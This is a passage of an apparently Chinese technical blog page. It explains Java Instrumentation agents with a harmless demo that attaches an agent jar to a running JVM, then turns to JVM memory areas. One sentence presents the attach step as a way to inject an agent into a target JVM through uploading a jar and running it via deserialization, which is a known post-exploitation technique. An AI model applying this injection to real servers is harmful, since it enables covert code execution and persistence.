rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">Instrumentation接口</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><a href="http://itmyhome.com/java-api/java/lang/instrument/Instrumentation.html" target="_blank">http://itmyhome.com/java-api/java/lang/instrument/Instrumentation.html</a> 接口文档</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">interface</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">Instrumentation</span></span>{    <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//添加ClassFileTransformer</span>    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">addTransformer</span><span style="line-height: 26px;">(ClassFileTransformer transformer, <span style="color: rgb(198, 120, 221);line-height: 26px;">boolean</span> canRetransform)</span></span>;    <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//添加ClassFileTransformer</span>    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">addTransformer</span><span style="line-height: 26px;">(ClassFileTransformer transformer)</span></span>;    <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//移除ClassFileTransformer</span>    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">boolean</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">removeTransformer</span><span style="line-height: 26px;">(ClassFileTransformer transformer)</span></span>;    <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//是否可以被重新定义</span>    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">boolean</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">isRetransformClassesSupported</span><span style="line-height: 26px;">()</span></span>;    <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//重新定义Class文件</span>    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">redefineClasses</span><span style="line-height: 26px;">(ClassDefinition... definitions)</span>        <span style="color: rgb(198, 120, 221);line-height: 26px;">throws</span> ClassNotFoundException, UnmodifiableClassException</span>;    <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//是否可以修改Class文件</span>    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">boolean</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">isModifiableClass</span><span style="line-height: 26px;">(Class<?> theClass)</span></span>;    <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//获取所有加载的Class</span>    <span style="color: rgb(97, 174, 238);line-height: 26px;">@SuppressWarnings</span>(<span style="color: rgb(152, 195, 121);line-height: 26px;">"rawtypes"</span>)    Class[] getAllLoadedClasses();    <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//获取指定类加载器已经初始化的类</span>    <span style="color: rgb(97, 174, 238);line-height: 26px;">@SuppressWarnings</span>(<span style="color: rgb(152, 195, 121);line-height: 26px;">"rawtypes"</span>)    Class[] getInitiatedClasses(ClassLoader loader);    <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//获取某个对象的大小</span>    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">long</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">getObjectSize</span><span style="line-height: 26px;">(Object objectToSize)</span></span>;    <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//添加指定jar包到启动类加载器检索路径</span>    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">appendToBootstrapClassLoaderSearch</span><span style="line-height: 26px;">(JarFile jarfile)</span></span>;    <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//添加指定jar包到系统类加载检索路径</span>    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">appendToSystemClassLoaderSearch</span><span style="line-height: 26px;">(JarFile jarfile)</span></span>;    <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//本地方法是否支持前缀</span>    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">boolean</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">isNativeMethodPrefixSupported</span><span style="line-height: 26px;">()</span></span>;    <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//设置本地方法前缀，一般用于按前缀做匹配操作</span>    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">setNativeMethodPrefix</span><span style="line-height: 26px;">(ClassFileTransformer transformer, String prefix)</span></span>;}</p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">ClassFileTransformer接口</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">interface</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">ClassFileTransformer</span></span>{    <span style="color: rgb(198, 120, 221);line-height: 26px;">byte</span>[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined,        ProtectionDomain protectionDomain, <span style="color: rgb(198, 120, 221);line-height: 26px;">byte</span>[] classfileBuffer)        <span style="color: rgb(198, 120, 221);line-height: 26px;">throws</span> IllegalClassFormatException;}</p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">原文如下</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><a href="https://www.yuque.com/tianxiadamutou/zcfd4v/tdvszq" target="_blank">https://www.yuque.com/tianxiadamutou/zcfd4v/tdvszq</a></p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">首先利用 addTransformer 注册一个 transformer ，然后创建一个 ClassFileTransformer 抽象类的实现类，然后 override transform 方法</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> java.lang.instrument.Instrumentation;<span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">class</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">AgentMain</span> </span>{    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">static</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">agentmain</span><span style="line-height: 26px;">(String agentArgs, Instrumentation ins)</span> </span>{        ins.addTransformer(<span style="color: rgb(198, 120, 221);line-height: 26px;">new</span> DefineTransformer(),<span style="color: rgb(198, 120, 221);line-height: 26px;">true</span>);    }}</p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">在 transform 中定义自己的逻辑</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> java.lang.instrument.ClassFileTransformer;<span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> java.lang.instrument.IllegalClassFormatException;<span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> java.security.ProtectionDomain;<span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">class</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">DefineTransformer</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">implements</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">ClassFileTransformer</span> </span>{    <span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">byte</span>[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, <span style="color: rgb(198, 120, 221);line-height: 26px;">byte</span>[] classfileBuffer) <span style="color: rgb(198, 120, 221);line-height: 26px;">throws</span> IllegalClassFormatException {        System.out.println(className);        <span style="color: rgb(198, 120, 221);line-height: 26px;">return</span> classfileBuffer;    }}</p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">创建 jar 文件清单 agentmain.mf</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;">Manifest-Version: 1.0Can-Redefine-Classes: trueCan-Retransform-Classes: trueAgent-Class: AgentMain</p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">打成jar包</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;">jar cvfm AgentMain.jar agentmain.mf AgentMain.class DefineTransformer.class</p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">attach进程</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;">import com.sun.tools.attach.VirtualMachine;import com.sun.tools.attach.VirtualMachineDescriptor;import java.util.List;public class AgentMainDemo {    public static void main(String[] args) throws Exception{        String path = "AgentMain.jar的路径";        List<VirtualMachineDescriptor> list = VirtualMachine.list();        for (VirtualMachineDescriptor v:list){            System.out.println(v.displayName());            if (v.displayName().contains("AgentMainDemo")){              	// 将 jvm 虚拟机的 pid 号传入 attach 来进行远程连接                VirtualMachine vm = VirtualMachine.attach(v.id());              	// 将我们的 agent.jar 发送给虚拟机                 vm.loadAgent(path);                vm.detach();            }        }    }}</p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">所以需要我们上传jar包然后通过反序列化执行上面的代码，就可以获取到 jvm 的 pid 号之后，调用 loadAgent 方法将 agent.jar 注入进去</p><h2 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 22px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JVM</h2><figure style="margin-top: 10px;margin-bottom: 10px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><figcaption style="margin-top: 5px;text-align: center;color: rgb(136, 136, 136);font-size: 14px;">jvm-framework</figcaption></figure><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><strong style="color: black;">线程私有</strong>：程序计数器、虚拟机栈、本地方法区</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><strong style="color: black;">线程共享</strong>：堆、方法区, 堆外内存（Java7的永久代或JDK8的元空间、代码缓存）</p></li></ul><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 20px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">程序计数器</h3><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><strong>JVM 中的 PC 寄存器是对物理 PC 寄存器的一种抽象模拟</strong>。</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">程序计数器是一块较小的内存空间，可以看作是当前线程所执行的字节码的<strong>行号指示器</strong>。每个线程都分配了一个PC寄存器，每个线程都独立计算，不会互相影响.它是一块很小的内存空间，几乎可以忽略不计。也是运行速度最快的存储区域</p><h4 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 18px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">虚拟机栈</h4><div style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">可以通过参数<p style="font-size: 14px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);word-break: break-all;">-Xss</p>来设置线程的最大栈空间</div><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">栈不存在垃圾回收问题</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">Java 虚拟机规范允许 <strong>Java虚拟机栈的大小是动态的或者是固定不变的</strong></p><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">如果采用固定大小的 Java 虚拟机栈，那每个线程的 Java 虚拟机栈容量可以在线程创建的时候独立选定。如果线程请求分配的栈容量超过 Java 虚拟机栈允许的最大容量，Java 虚拟机将会抛出一个 <strong>StackOverflowError</strong> 异常</p></div></li><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">如果 Java 虚拟机栈可以动态扩展，并且在尝试扩展的时候无法申请到足够的内存，或者在创建新的线程时没有足够的内存去创建对应的虚拟机栈，那 Java 虚拟机将会抛出一个<strong>OutOfMemoryError</strong>异常</p></div></li><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">执行引擎运行的所有字节码指令只针对当前栈帧进行操作</p></div></li><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">如果在该方法中调用了其他方法，对应的新的栈帧会被创建出来，放在栈的顶端，称为新的当前栈帧</p></div></li><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">如果当前方法调用了其他方法，方法返回之际，当前栈帧会传回此方法的执行结果给前一个栈帧，接着，虚拟机会丢弃当前栈帧，使得前一个栈帧重新成为当前栈帧</p></div></li></ul><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">执行方法->压栈->调用了其他方法->压栈执行->执行结束出栈->执行结束出栈</p><figure style="margin-top: 10px;margin-bottom: 10px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><figcaption style="margin-top: 5px;text-align: center;color: rgb(136, 136, 136);font-size: 14px;">jvm-stack-frame</figcaption></figure><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">每个<strong>栈帧</strong>（Stack Frame）中存储着：</p><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">局部变量表（Local Variables）</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">操作数栈（Operand Stack）(或称为表达式栈)</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">动态链接（Dynamic Linking）：指向运行时常量池的方法引用</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">方法返回地址（Return Address）：方法正常退出或异常退出的地址</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">一些附加信息</p></li></ul><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><strong>每一个栈帧内部都包含一个指向运行时常量池中该栈帧所属方法的引用</strong></p><figure style="margin-top: 10px;margin-bottom: 10px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><figcaption style="margin-top: 5px;text-align: center;color: rgb(136, 136, 136);font-size: 14px;">jvm-dynamic-linking</figcaption></figure><h4 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 18px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">本地方法栈</h4><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">简单的讲，一个 Native Method 就是一个 Java 调用非 Java 代码的接口。我们知道的 Unsafe 类就有很多本地方法</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">与 Java 环境外交互：有时 Java 应用需要与 Java 外面的环境交互，这就是本地方法存在的原因。</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">与操作系统交互：JVM 支持 Java 语言本身和运行时库，但是有时仍需要依赖一些底层系统的支持。通过本地方法，我们可以实现用 Java 与实现了 jre 的底层系统交互， JVM 的一些部分就是 C 语言写的。</p><div style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">Sun's Java：Sun的解释器就是C实现的，这使得它能像一些普通的C一样与外部交互。jre大部分都是用 Java 实现的，它也通过一些本地方法与外界交互。比如，类 <p style="font-size: 14px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);word-break: break-all;">java.lang.Thread</p> 的 <p style="font-size: 14px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);word-break: break-all;">setPriority()</p> 的方法是用Java 实现的，但它实现调用的是该类的本地方法 <p style="font-size: 14px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);word-break: 